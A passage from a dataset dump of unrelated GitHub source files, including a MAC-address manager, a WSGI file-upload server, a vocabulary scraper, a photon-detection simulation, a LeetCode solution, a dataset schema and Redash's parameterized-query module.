value\n\n def save(self):\n title = self.validated_data['title']\n author = self.validated_data['author']\n year = self.validated_data['year']\n b = Book(title=title, author=author, year=year)\n print(f'created: {b}')\n\n\nserializer = 
BookSerializers(b)\n\nprint(serializer.data)\n","repo_name":"psgpyc/kitabalaya","sub_path":"corebookmodels/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71861468321","text":"#!/usr/bin/python3.4\n\nimport functions\nimport sys\nimport re\nimport json\nimport os\n\nclass Mac_Man(functions.Functions):\n def __init__(self,address): #each object is linked to this one address\n self.tracking = [] #initializes the empty tracking list\n self.switch = []\n self.address = address\n self.load()\n#These are for the local lists - switch and tracking devices\n def check(self,mac): #This is a physical formatting verification\n #Any time this is called, we want it to test that the mac address is valid\n mac_format = re.compile('..:..:..:..:..:..') #Checks the formatting of the mac string\n return re.match(mac_format,mac.strip())\n #Can think about adding this later if it demands greater security\n def refresh(self): #removes duplicates from the lists. Should be automatically called regularly.\n self.tracking = list(set(self.tracking))\n self.switch = list(set(self.switch))\n return None\n def add(self,info):#Really the only function to be called\n #Adds the switchmate information\n if isinstance(info,tuple): #Adds the data regarding switchmate\n try:\n assert self.check(info[0])\n self.switch.append(info)\n self.refresh() #To avoid duplicate values\n except AssertionError:\n print(\"Could not add peripheral info\")\n except IndexError:\n print(\"Add authorization code to update\")\n elif isinstance(info,str): #Adds the tracking info\n try:\n assert self.check(info)\n self.tracking.append(info)\n self.refresh() #To avoid duplicates\n except AssertionError:\n print(\"Could not add tracking info\")\n else:\n pass\n self.save() #Saves the added part\n def remove(self,info):\n if isinstance(info,tuple):\n if info in [i[0] for i in self.switch]: self.switch.remove(info)\n print(\"Removed switch.\")\n elif isinstance(info,str):\n if info in [i.encode('utf-8') for i in self.tracking]: self.tracking.remove(info)\n print(\"Removed peripheral.\")\n self.save()\n\n def prep(self,value=0): #This function preps the mac addresses for processing in the Functions method. 
Default is to take the first value\n try:\n assert self.tracking\n assert self.switch\n assert len(self.switch[value])==2\n prepped = (self.tracking[value],self.switch[value])\n super(Mac_Man, self).__init__(prepped)\n except:\n print(\"Problems with preparation\")\n#These are for the file storage system\n def reset(self): #Erase the contents of the file\n self.tracking = []\n self.switch = []\n with open(self.address,\"w\"):\n pass\n def load(self): #Grabs the data from the stored file\n try:\n with open(self.address,'a+') as json_data:\n data = json.load(json_data)\n adding_tracking = [self.add(item.encode('utf-8')) for item in data[0]]\n adding_switch = [self.add((item[0].encode('utf-8'),item[1].encode('utf-8'))) for item in data[1]]\n except (AttributeError, ValueError) as e:\n print(\"Data was not loaded.\")\n self.data = [] #This is the default error state\n def save(self):\n #Can be used as a confirmation to verify that the data was indeed saved\n try:\n with open(self.address, 'w+') as f:\n json.dump((self.tracking,self.switch),f)\n except:\n print(\"Unable to save\")\n","repo_name":"IELOCC/IEL_OCC","sub_path":"mac_man.py","file_name":"mac_man.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"274322213","text":"import HTMLParser\nimport argparse\nimport cgi\nimport httplib\nimport logging\nimport os\n\nfrom wsgiref.simple_server import make_server\n\n\nFILE_FIELD_NAME = 'upfile'\n\ndef SendUploadForm(response, uploaded_file_name=None):\n response('200 OK', [('Content-Type','text/html')])\n\n uploaded_file_message = ''\n if uploaded_file_name:\n html_parser = HTMLParser.HTMLParser()\n html_safe_filename = html_parser.unescape(uploaded_file_name)\n uploaded_file_message = ('
<p>File uploaded under name: {0}</p>'\n                             .format(html_safe_filename))\n\n    return '''\n    <html>\n    <body>\n        <h1>Upload a file</h1>\n        {0}\n        <form method=\"POST\" enctype=\"multipart/form-data\">\n            <input type=\"file\" name=\"{1}\">\n            <br>\n            <input type=\"submit\" value=\"Upload\">\n        </form>\n    </body>\n    </html>
\n \n \n '''.format(uploaded_file_message, FILE_FIELD_NAME)\n\n\ndef SendErrorPage(response, error_code, message):\n error_message = httplib.responses[error_code]\n error_status = '%d %s' % (error_code, error_message)\n headers = [('Content-Type','text/html')]\n response(error_status, headers)\n return \"\"\"\n \n \n
<h1>{0}</h1>\n        <p>{1}</p>
\n \n \n \"\"\".format(error_status, cgi.escape(message))\n\n\ndef UniqueLocalFilename(filename):\n filename = os.path.split(filename)[1] # strip the path\n local_filename = os.path.join(os.getcwd(), filename)\n\n new_filename = local_filename\n i = 0\n while os.path.exists(new_filename):\n new_filename = '%s-%d' % (local_filename, i)\n i += 1\n\n return new_filename\n\n\ndef SaveFile(filename, data):\n logging.info(\"saving file %r\", filename)\n with open(filename, 'wb') as outfile:\n outfile.write(data.read())\n logging.info(\"saved file as %r\", filename)\n\n\nclass UploaderApp(object):\n ''' Simple WSGI CGI app which controls the upload process. '''\n\n def __call__(self, environ, response):\n if environ['PATH_INFO'] != '/':\n error_message = 'Not found: %s' % (environ['PATH_INFO'],)\n return SendErrorPage(response, httplib.NOT_FOUND, error_message)\n\n handlers = {\n 'GET': self.GET,\n 'POST': self.POST,\n }\n handler = handlers.get(environ['REQUEST_METHOD'], self.DefaultHandler)\n return handler(environ, response)\n\n def DefaultHandler(self, environ, response):\n error_message = 'Method not allowed: %s' % (environ['REQUEST_METHOD'],)\n return SendErrorPage(response, httplib.METHOD_NOT_ALLOWED, error_message)\n\n def POST(self, environ, response):\n field_storage = cgi.FieldStorage(fp=environ['wsgi.input'], environ=environ)\n if FILE_FIELD_NAME not in field_storage:\n return SendErrorPage(response, httplib.PRECONDITION_FAILED,\n 'No file data recieved.')\n upload_field = field_storage[FILE_FIELD_NAME]\n filename = UniqueLocalFilename(upload_field.filename)\n SaveFile(filename, upload_field.file)\n return SendUploadForm(response, filename)\n\n def GET(self, environ, response):\n return SendUploadForm(response)\n\n\ndef ParseArguments():\n ''' Uses argparse to parse command line arguments and flags in sys.argv for\n the cmd-line interface to uploadserver.\n Returns an argparse namespace with the parsed arguments.\n '''\n parser = argparse.ArgumentParser(\n description=('A simple HTTP server which allows files to be uploaded '\n 'to the directory the server was started in.'),\n )\n parser.add_argument('-h', '--host',\n help=('The host to listen on. Defaults to \"0.0.0.0\" to listen on all '\n 'hosts. This allows anyone on the same network to reach '\n 'the server.'),\n default='0.0.0.0',\n )\n parser.add_argument('-p', '--port',\n help='The port number to start the server on. 
Default is 8000.',\n type=int,\n default=8000,\n )\n return parser.parse_args()\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n args = ParseArguments()\n logging.info('Starting HTTP file upload server on host %r and port %d',\n args.host, args.port)\n httpd = make_server(args.host, args.port, UploaderApp())\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cookyt/upload-server","sub_path":"uploadserver.py","file_name":"uploadserver.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73474566561","text":"# -*- coding: utf-8 -*-\n\"\"\"\nfetch vocabulary lists from vocabulary.com, thanks for their great work!\n\"\"\"\nimport os\nimport urlparse\nimport bs4\nimport utility\nimport constants\n\n\ndef update_all_lists():\n raw_content = utility.get_raw_content(\n urlparse.urljoin(constants.VOCABULARY_HOME_URL, 'lists'), 'col9 listcats pad2x ')\n if raw_content == '':\n return\n category_raw_content_list = str(raw_content).split('section class')\n for category_raw_content in category_raw_content_list:\n name = utility.extract_info_from_raw(\n category_raw_content, 'sectionHeader').strip()\n if name == '':\n continue\n if name == 'Featured Lists':\n update_list(category_raw_content, 'featured')\n if name == 'Top Rated Lists':\n update_list(category_raw_content, 'top-rated')\n for url_postfix in constants.CATEGORY_DICT.keys():\n url = constants.VOCABULARY_HOME_URL + 'lists/' + url_postfix\n content = utility.get_content_of_url(url)\n soup = str(bs4.BeautifulSoup(content, 'lxml'))\n try:\n if soup.find('bycat hasmore') < 0:\n p('Cannot find phrase \"bycat hasmore\"!')\n p(soup)\n p(url_postfix)\n return\n except:\n return\n update_list(str(soup).split('bycat hasmore')[1], url_postfix)\n utility.show_notification(\n 'Captain Update Vocabulary Lists', 'Update Successfully!')\n return\n\n\ndef get_all_vocabulary_lists():\n result = dict()\n if os.path.exists(constants.LISTS_FEATURED):\n result['featured'] = utility.load_json_file(constants.LISTS_FEATURED)\n if os.path.exists(constants.LISTS_TOP_RATED):\n result['top-rated'] = utility.load_json_file(constants.LISTS_TOP_RATED)\n if os.path.exists(constants.LISTS_TEST_PREP):\n result['test-prep'] = utility.load_json_file(constants.LISTS_TEST_PREP)\n if os.path.exists(constants.LISTS_LITERATURE):\n result['literature'] = utility.load_json_file(\n constants.LISTS_LITERATURE)\n if os.path.exists(constants.LISTS_MORPHOLOGY_ROOTS):\n result['morphology-and-roots'] = utility.load_json_file(\n constants.LISTS_MORPHOLOGY_ROOTS)\n if os.path.exists(constants.LISTS_HISTORICAL_DOCUMENTS):\n result['historical-documents'] = utility.load_json_file(\n constants.LISTS_HISTORICAL_DOCUMENTS)\n if os.path.exists(constants.LISTS_SPEECHES):\n result['speeches'] = utility.load_json_file(constants.LISTS_SPEECHES)\n if os.path.exists(constants.LISTS_JUST_FOR_FUN):\n result['just-for-fun'] = utility.load_json_file(\n constants.LISTS_JUST_FOR_FUN)\n if os.path.exists(constants.LISTS_NEWS):\n result['news'] = utility.load_json_file(constants.LISTS_NEWS)\n return result\n\n\ndef get_lists_by_category(category_name):\n if category_name == 'featured':\n return utility.load_json_file(constants.LISTS_FEATURED)\n if category_name == 'top-rated':\n return utility.load_json_file(constants.LISTS_TOP_RATED)\n if category_name == 'test-prep':\n return utility.load_json_file(constants.LISTS_TEST_PREP)\n if category_name == 'literature':\n return 
utility.load_json_file(constants.LISTS_LITERATURE)\n if category_name == 'morphology-and-roots':\n return utility.load_json_file(constants.LISTS_MORPHOLOGY_ROOTS)\n if category_name == 'historical-documents':\n return utility.load_json_file(constants.LISTS_HISTORICAL_DOCUMENTS)\n if category_name == 'speeches':\n return utility.load_json_file(constants.LISTS_SPEECHES)\n if category_name == 'just-for-fun':\n return utility.load_json_file(constants.LISTS_JUST_FOR_FUN)\n if category_name == 'news':\n return utility.load_json_file(constants.LISTS_NEWS)\n\n\ndef get_list_data(category_name, list_name):\n if category_name == 'featured':\n return get_value_by_key(utility.load_json_file(constants.LISTS_FEATURED), list_name)\n if category_name == 'top-rated':\n return get_value_by_key(utility.load_json_file(constants.LISTS_TOP_RATED), list_name)\n if category_name == 'test-prep':\n return get_value_by_key(utility.load_json_file(constants.LISTS_TEST_PREP), list_name)\n if category_name == 'literature':\n return get_value_by_key(utility.load_json_file(constants.LISTS_LITERATURE), list_name)\n if category_name == 'morphology-and-roots':\n return get_value_by_key(utility.load_json_file(constants.LISTS_MORPHOLOGY_ROOTS), list_name)\n if category_name == 'historical-documents':\n return get_value_by_key(utility.load_json_file(constants.LISTS_HISTORICAL_DOCUMENTS), list_name)\n if category_name == 'speeches':\n return get_value_by_key(utility.load_json_file(constants.LISTS_SPEECHES), list_name)\n if category_name == 'just-for-fun':\n return get_value_by_key(utility.load_json_file(constants.LISTS_JUST_FOR_FUN), list_name)\n if category_name == 'news':\n return get_value_by_key(utility.load_json_file(constants.LISTS_NEWS), list_name)\n\n\ndef get_value_by_key(dict_data, key):\n if key in dict_data:\n return dict_data[key]\n else:\n return None\n\n\ndef write_lists_by_category_and_data(category_name, lists_data):\n if category_name == 'featured':\n utility.write_json_file(constants.LISTS_FEATURED, lists_data)\n if category_name == 'top-rated':\n utility.write_json_file(constants.LISTS_TOP_RATED, lists_data)\n if category_name == 'test-prep':\n utility.write_json_file(constants.LISTS_TEST_PREP, lists_data)\n if category_name == 'literature':\n utility.write_json_file(constants.LISTS_LITERATURE, lists_data)\n if category_name == 'morphology-and-roots':\n utility.write_json_file(constants.LISTS_MORPHOLOGY_ROOTS, lists_data)\n if category_name == 'historical-documents':\n utility.write_json_file(\n constants.LISTS_HISTORICAL_DOCUMENTS, lists_data)\n if category_name == 'speeches':\n utility.write_json_file(constants.LISTS_SPEECHES, lists_data)\n if category_name == 'just-for-fun':\n utility.write_json_file(constants.LISTS_JUST_FOR_FUN, lists_data)\n if category_name == 'news':\n utility.write_json_file(constants.LISTS_NEWS, lists_data)\n\n\ndef update_list(category_raw_content, category_name):\n \"\"\"\n get all of list detailed information from category\n \"\"\"\n category_lists_dict = get_lists_by_category(category_name)\n\n item_raw_content_list = category_raw_content.split('wordlist shortlisting')\n for item_raw_content in item_raw_content_list[1:]:\n list_name = utility.extract_info_from_raw(\n item_raw_content.replace('#', ''), 'href')\n if list_name in category_lists_dict:\n continue\n\n list_brief_description = utility.extract_info_from_raw(\n item_raw_content, 'description')\n if len(list_brief_description) > 160:\n list_brief_description = list_brief_description[:160] + '...'\n list_words_num = 
utility.extract_info_from_raw(\n item_raw_content, 'readMore')\n list_href = extract_detailed_address(item_raw_content)\n if list_name == '' or list_href == '':\n continue\n\n category_lists_dict[list_name] = dict()\n category_lists_dict[list_name]['list_brief_description'] = list_brief_description\n category_lists_dict[list_name]['list_num'] = list_words_num\n category_lists_dict[list_name]['list_href'] = list_href\n category_lists_dict[list_name]['list_detailed_info'] = []\n\n # ------------------------------------------\n # detailed_description of list\n entire_list_url = urlparse.urljoin(\n constants.VOCABULARY_HOME_URL, list_href)\n raw_words_list_description = utility.get_raw_content(\n entire_list_url, 'description')\n if raw_words_list_description is not None:\n words_list_description = utility.extract_info_from_raw(\n raw_words_list_description, 'description')\n category_lists_dict[list_name]['list_detailed_description'] = words_list_description\n\n raw_words_list_content_list = utility.get_raw_content(\n entire_list_url, 'centeredContent').split('class=\\\"entry learnable\\\"')\n\n for content in raw_words_list_content_list:\n if 'class=\"definition\"' not in content:\n raw_words_list_content_list.remove(content)\n for index, raw_words_list_content in enumerate(raw_words_list_content_list):\n raw_words_list_content = raw_words_list_content.replace(\n '&', '&')\n raw_words_list_content = raw_words_list_content.replace('\\n', ' ')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace('
', '')\n name = utility.extract_info_from_raw(\n raw_words_list_content, 'href')\n if name == \"definitions & notes\":\n continue\n\n definition = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"definition\\\"')\n example = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"example\\\"')\n description = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"description\\\"')\n\n list_detailed_info_dict = dict()\n list_detailed_info_dict[name] = name\n list_detailed_info_dict[name] = dict()\n list_detailed_info_dict[name]['index'] = index\n list_detailed_info_dict[name]['word_definition'] = definition\n list_detailed_info_dict[name]['word_example'] = example\n list_detailed_info_dict[name]['word_description'] = description\n\n category_lists_dict[list_name]['list_detailed_info'].append(\n list_detailed_info_dict)\n\n write_lists_by_category_and_data(category_name, category_lists_dict)\n\n\ndef extract_detailed_address(raw_content):\n \"\"\"\n :param raw_content:\n :return: return list address, such as 'lists/1752913'\n \"\"\"\n try:\n point_one_index = raw_content.index('href')\n except:\n return ''\n left_colon_index = raw_content[point_one_index:].index(\n '\"') + point_one_index + 1\n right_colon_index = raw_content[left_colon_index:].index(\n '\"') + left_colon_index\n return raw_content[left_colon_index:right_colon_index]\n\n\nif __name__ == \"__main__\":\n update_all_lists()\n","repo_name":"leowucn/captain","sub_path":"src/learn_english/model/vocabulary_list.py","file_name":"vocabulary_list.py","file_ext":"py","file_size_in_byte":11009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"29068305420","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# --- Calculating efficiency based on assumption that ---\n# --- there can be as many photons per write/read gate---\n\n# No noise, no dephasing is taken into account here\n\np = np.arange(0.01,1,0.01) # p ranging from 0 to 1\neta_det = 0.05 # Detection efficiency (same for write and read here)\neta_read = 0.5 # Readout efficiency\npw_geo = eta_det*(1/(1-p)-1) #pw, based on geometric series\npwr_geo = eta_det**2*(1/(1-p)-1)*eta_read # pwr, based on geometric series\n\n# --- Calculating efficiency based on assumption that ---\n# --- only one photon can be detected per write/read gate ---\n\npw = np.zeros(len(p))\npwr = np.zeros(len(p))\n\nfor i,x in enumerate(p):\n print(f'\\nprobability: {x}')\n pw_list = np.zeros(100)\n pwr_list = np.zeros(100)\n for n in range(len(pw_list)):\n pw_list[n] = eta_det*x**(n+1)*(1-np.sum(pw_list))\n pwr_list[n] = eta_det**2*x**(n+1)*eta_read*(1-np.sum(pwr_list))\n print(f'n: {n}')\n print(f'\\tpw_list[n]:{pw_list[n]}, \\tpr_list[n] {pwr_list[n]}')\n \n pw[i] = np.sum(pw_list)\n pwr[i] = np.sum(pwr_list)\n print(pw[i])\n\nprw = pwr/pw\n\n#%% --- Plotting\nplt.figure(0)\nplt.plot(p,pw*100, label = r'$p_w$')\nplt.plot(p,pwr*100, label = r'$p_{w,r}$')\nplt.plot(p,prw*100, label = r'$p_{r|w}$')\nplt.plot(p,pw_geo*100, label = r'$p_{w}$ (geo)')\nplt.plot(p,pwr_geo*100, label = r'$p_{w,r}$ (geo)')\nplt.ylabel(r'p [%]')\nplt.xlabel(r'$p$')\nplt.ylim([0,110])\nplt.xlim([0,1])\nplt.legend()\nplt.grid()\n\n#%% --- Full Simulation of countrates ---\n\nN = 100000 # number of trials\ndead = 40 # deadtime of detector\nwidth_w = 300 # width of pulse\n\nemitted_photons = np.random.normal(0,width_w,N)\n\ntemp_list = []\nfor _ in range(5):\n emitted_photons = np.random.normal(0,width_w,N)\n kickout = 
np.ones(len(emitted_photons), dtype = bool)\n for i,photon_1 in enumerate(emitted_photons[:-1]):\n if np.abs(photon_1 - emitted_photons[i+1]) < dead and emitted_photons[i+1]> photon_1:\n kickout[i] = False\n temp_list.append(len(emitted_photons[kickout])/N)\n\naverage = np.array(temp_list).mean()\nprint(f'Average detection probability: {average} %')\n \nplt.figure(1)\ndetected_photons = emitted_photons[kickout]\ncount, bins, ignored = plt.hist(detected_photons, 100, density=False)\nplt.plot(bins, 1/(width_w * np.sqrt(2 * np.pi)) *\n np.exp( - (bins - 0)**2 / (2 * width_w**2) )*N*(bins[1]-bins[0]),\n linewidth=2, color='r') \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"LukasHeller/simulations","sub_path":"probabilities_including_real_detection.py","file_name":"probabilities_including_real_detection.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8291945159","text":"\"\"\"\n238. 除自身以外数组的乘积\n数组 前缀和\n中等\n\n\n给你一个长度为 n 的整数数组 nums,其中 n > 1,返回输出数组 output ,其中 output[i] 等于 nums 中除 nums[i] 之外其余各元素的乘积。\n\n \n\n示例:\n\n输入: [1,2,3,4]\n输出: [24,12,8,6]\n \n\n提示:题目数据保证数组之中任意元素的全部前缀元素和后缀(甚至是整个数组)的乘积都在 32 位整数范围内。\n\n说明: 请不要使用除法,且在 O(n) 时间复杂度内完成此题。\n\n进阶:\n你可以在常数空间复杂度内完成这个题目吗?( 出于对空间复杂度分析的目的,输出数组不被视为额外空间。)\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/product-of-array-except-self\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n size = len(nums)\n ans = [0] * size\n ans[0] = 1\n for i in range(1, size):\n ans[i] = ans[i-1] * nums[i-1]\n right = 1\n for i in range(size-1, -1, -1):\n ans[i] = ans[i] * right\n right *= nums[i]\n return ans\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n result = solution.productExceptSelf([1, 2, 3, 4])\n print(result)\n assert result == [24, 12, 8, 6]\n","repo_name":"geeknonerd/leetcode","sub_path":"smath/product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"zh","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"35347244303","text":"\"\"\"Define the domain of dataset\"\"\"\nfrom .error_type import *\n\n# details of each dataset\nKDD = {\n \"data_dir\": \"KDD\",\n \"error_types\": [\"missing_values\", \"outliers\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nCitation = {\n \"data_dir\": \"Citation\",\n \"error_types\": [\"duplicates\"],\n 'key_columns': ['title'],\n \"label\":\"CS\",\n \"ml_task\": \"classification\",\n \"text_variables\":[\"title\"],\n}\n\nMarketing = {\n \"data_dir\": \"Marketing\",\n \"error_types\": [\"missing_values\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nAirbnb = {\n \"data_dir\": \"Airbnb\",\n \"error_types\": [\"missing_values\", \"outliers\", \"duplicates\"],\n \"label\": 'Rating',\n \"categorical_variables\": ['Rating'],\n \"ml_task\": \"classification\",\n 'key_columns': ['latitude', 'longitude'],\n}\n\nTitanic = {\n \"data_dir\": \"Titanic\",\n \"error_types\": [\"missing_values\"],\n \"drop_variables\": ['PassengerId', 'Name'],\n \"label\": \"Survived\",\n \"categorical_variables\":[\"Survived\"],\n \"ml_task\": \"classification\"\n}\n\nEEG = {\n \"data_dir\": \"EEG\",\n \"error_types\": [\"outliers\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": 
\"classification\"\n}\n\nUSCensus = {\n \"data_dir\": \"USCensus\",\n \"error_types\": [\"missing_values\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nRestaurant = {\n \"data_dir\": \"Restaurant\",\n \"error_types\": [\"duplicates\", \"inconsistency\"],\n \"label\": \"priceRange\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"streetAddress\", \"telephone\", \"website\"],\n \"text_variables\": [\"name\", \"categories\", \"neighborhood\"],\n \"key_columns\": [\"telephone\"]\n}\n\nCredit = {\n \"data_dir\": \"Credit\",\n \"error_types\": [\"missing_values\", \"outliers\"],\n \"label\": \"SeriousDlqin2yrs\",\n \"categorical_variables\":[\"SeriousDlqin2yrs\"],\n \"ml_task\": \"classification\",\n \"class_imbalance\":True\n}\n\nSensor = {\n \"data_dir\": \"Sensor\",\n \"error_types\": [\"outliers\"],\n \"categorical_variables\": ['moteid'],\n \"label\": 'moteid',\n \"ml_task\": \"classification\"\n}\n\nMovie = {\n \"data_dir\": \"Movie\",\n \"error_types\": [\"duplicates\", \"inconsistency\"],\n \"key_columns\": [\"title\", \"year\"],\n \"categorical_variables\": [\"genres\"],\n \"text_variables\": [\"title\"],\n \"label\": \"genres\",\n \"ml_task\": \"classification\"\n}\n\nCompany = {\n \"data_dir\": \"Company\",\n \"error_types\": [\"inconsistency\"],\n \"label\": \"Sentiment\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"Date\", \"Unnamed: 0\", \"City\"]\n}\n\nUniversity = {\n \"data_dir\": \"University\",\n \"error_types\": [\"inconsistency\"],\n \"label\": \"expenses thous$\",\n \"ml_task\": \"classification\",\n \"drop_variables\": [\"university name\", \"academic-emphasis\"]\n}\n\nKDD_major = {\n \"data_dir\": \"KDD_major\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nKDD_minor = {\n \"data_dir\": \"KDD_minor\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nKDD_uniform = {\n \"data_dir\": \"KDD_uniform\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'is_exciting_20',\n \"ml_task\": \"classification\",\n \"class_imbalance\": True,\n \"categorical_variables\":['is_exciting_20'],\n}\n\nUSCensus_major = {\n \"data_dir\": \"USCensus_major\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nUSCensus_minor = {\n \"data_dir\": \"USCensus_minor\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nUSCensus_uniform = {\n \"data_dir\": \"USCensus_uniform\",\n \"error_types\": [\"mislabel\"],\n \"label\": 'Income',\n \"ml_task\": \"classification\"\n}\n\nEEG_major = {\n \"data_dir\": \"EEG_major\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\nEEG_minor = {\n \"data_dir\": \"EEG_minor\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\nEEG_uniform = {\n \"data_dir\": \"EEG_uniform\",\n \"error_types\": [\"mislabel\"],\n 'label':'Eye',\n \"categorical_variables\":['Eye'],\n \"ml_task\": \"classification\"\n}\n\n# domain of dataset \ndatasets = [KDD, Credit, Airbnb, USCensus, EEG, Titanic, \n Marketing, Sensor, Movie, Restaurant, Citation, \n Company, University, KDD_uniform, KDD_minor, KDD_major,\n USCensus_uniform, 
USCensus_major, USCensus_minor,\n EEG_uniform, EEG_minor, EEG_major]","repo_name":"anatolicvs/NettoyageML","sub_path":"schema/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36805654642","text":"import pystache\nfrom functools import partial\nfrom flask_login import current_user\nfrom numbers import Number\nfrom redash.utils import mustache_render, json_loads\nfrom redash.permissions import require_access, view_only\nfrom funcy import distinct\nfrom dateutil.parser import parse\n\n\ndef _pluck_name_and_value(default_column, row):\n row = {k.lower(): v for k, v in row.items()}\n name_column = \"name\" if \"name\" in row.keys() else default_column.lower()\n value_column = \"value\" if \"value\" in row.keys() else default_column.lower()\n\n return {\"name\": row[name_column], \"value\": unicode(row[value_column])}\n\n\ndef _load_result(query_id):\n from redash.authentication.org_resolving import current_org\n from redash import models\n\n query = models.Query.get_by_id_and_org(query_id, current_org)\n require_access(query.data_source.groups, current_user, view_only)\n query_result = models.QueryResult.get_by_id_and_org(query.latest_query_data_id, current_org)\n\n return json_loads(query_result.data)\n\n\ndef dropdown_values(query_id):\n data = _load_result(query_id)\n first_column = data[\"columns\"][0][\"name\"]\n pluck = partial(_pluck_name_and_value, first_column)\n return map(pluck, data[\"rows\"])\n\n\ndef _collect_key_names(nodes):\n keys = []\n for node in nodes._parse_tree:\n if isinstance(node, pystache.parser._EscapeNode):\n keys.append(node.key)\n elif isinstance(node, pystache.parser._SectionNode):\n keys.append(node.key)\n keys.extend(_collect_key_names(node.parsed))\n\n return distinct(keys)\n\n\ndef _collect_query_parameters(query):\n nodes = pystache.parse(query)\n keys = _collect_key_names(nodes)\n return keys\n\n\ndef _parameter_names(parameter_values):\n names = []\n for key, value in parameter_values.iteritems():\n if isinstance(value, dict):\n for inner_key in value.keys():\n names.append(u'{}.{}'.format(key, inner_key))\n else:\n names.append(key)\n\n return names\n\n\ndef _is_date(string):\n try:\n parse(string)\n return True\n except ValueError:\n return False\n\n\ndef _is_date_range(obj):\n try:\n return _is_date(obj[\"start\"]) and _is_date(obj[\"end\"])\n except (KeyError, TypeError):\n return False\n\n\nclass ParameterizedQuery(object):\n def __init__(self, template, schema=None):\n self.schema = schema or []\n self.template = template\n self.query = template\n self.parameters = {}\n\n def apply(self, parameters):\n invalid_parameter_names = [key for (key, value) in parameters.iteritems() if not self._valid(key, value)]\n if invalid_parameter_names:\n raise InvalidParameterError(invalid_parameter_names)\n else:\n self.parameters.update(parameters)\n self.query = mustache_render(self.template, self.parameters)\n\n return self\n\n def _valid(self, name, value):\n if not self.schema:\n return True\n\n definition = next((definition for definition in self.schema if definition[\"name\"] == name), None)\n\n if not definition:\n return False\n\n validators = {\n \"text\": lambda value: isinstance(value, basestring),\n \"number\": lambda value: isinstance(value, Number),\n \"enum\": lambda value: value in definition[\"enumOptions\"],\n \"query\": lambda value: unicode(value) in [v[\"value\"] for v in 
dropdown_values(definition[\"queryId\"])],\n \"date\": _is_date,\n \"datetime-local\": _is_date,\n \"datetime-with-seconds\": _is_date,\n \"date-range\": _is_date_range,\n \"datetime-range\": _is_date_range,\n \"datetime-range-with-seconds\": _is_date_range,\n }\n\n validate = validators.get(definition[\"type\"], lambda x: False)\n\n return validate(value)\n\n @property\n def is_safe(self):\n text_parameters = filter(lambda p: p[\"type\"] == \"text\", self.schema)\n return not any(text_parameters)\n\n @property\n def missing_params(self):\n query_parameters = set(_collect_query_parameters(self.template))\n return set(query_parameters) - set(_parameter_names(self.parameters))\n\n @property\n def text(self):\n return self.query\n\n\nclass InvalidParameterError(Exception):\n def __init__(self, parameters):\n message = u\"The following parameter values are incompatible with their definitions: {}\".format(\", \".join(parameters))\n super(InvalidParameterError, self).__init__(message)\n","repo_name":"neo-ytx/redash-7.0.0","sub_path":"redash/utils/parameterized_query.py","file_name":"parameterized_query.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28200285588","text":"# Jogo\nfrom turtle import window_height\nfrom assets import * # Importa as funções\nfrom level_class import * # Importa as Classes\nimport pygame # Importa biblioteca Pygame\nfrom settings import *\nfrom random import choice\n\n# Inicializa o 